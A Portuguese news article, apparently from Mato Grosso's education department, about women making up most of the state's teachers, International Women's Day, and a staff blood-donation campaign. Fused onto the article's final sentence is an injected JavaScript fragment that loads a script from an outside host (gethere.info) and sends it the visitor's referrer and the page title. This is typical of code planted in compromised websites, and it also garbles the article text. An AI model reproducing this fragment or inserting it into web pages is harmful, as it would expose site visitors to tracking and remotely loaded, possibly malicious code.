Capa / Cidades / Público feminino é maioria na Educação e transforma ambiente

Público feminino é maioria na Educação e transforma ambiente

Público feminino é maioria na Educação e transforma ambienteAssessoria Seduc

Educar é proporcionar ao indivíduo os cuidados necessários para o desenvolvimento da sua personalidade. Uma tarefa que compete a homens e mulheres. Mas, a realidade perpetua os padrões antigos, recaindo a responsabilidade da educação, principalmente, sobre a mulher. As demonstrações refletem tanto nas famílias como nas escolas. Enfim, 8 de março é mais que uma data, representa uma conquista.
O Estado de Mato Grosso possui 73,5% do quadro de professores da educação básica (rede estadual de ensino) composto por mulheres, contra 26,5% de homens. Ou seja, a arte de ensinar parece persistir no âmbito feminino. Uma vez que em território familiar, não muda muito, a mulher consegue se dividir entre a educação dos filhos, a de dona de casa e ainda trabalhar fora.
8 de Março
O Dia Internacional da Mulher, comemorado em 8 de março, portanto, deveria ser de análise e novas atitudes. “Espero que esse dia sirva como reflexão da necessidade de trabalhar em conjunto e solidariamente”, pontuou o secretário adjunto de Políticas Educacionais.
De fato, a Constituição Federal não atribui a responsabilidade de educar a uma ou outra pessoa. Estabelece que “a educação, direito de todos e dever do Estado e da família, será promovida e incentivada com a colaboração da sociedade, visando ao pleno desenvolvimento da pessoa, seu preparo para o exercício da cidadania e sua qualificação para o trabalho”. Ou seja, a responsabilidade é estendida a todos, já que trata-se de um processo contínuo de desenvolvimento do ser humano.
Mas, em comemoração ao dia da mulher, mais uma vez são elas que darão o exemplo. Cerca de 20 profissionais da Seduc vão integrar a campanha de doação de sangue, no Hemocentro de Cuiabá. Na semana da mulher, especialmente no dia 09, elas externam o amor ao próximo, num ato pela vida.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top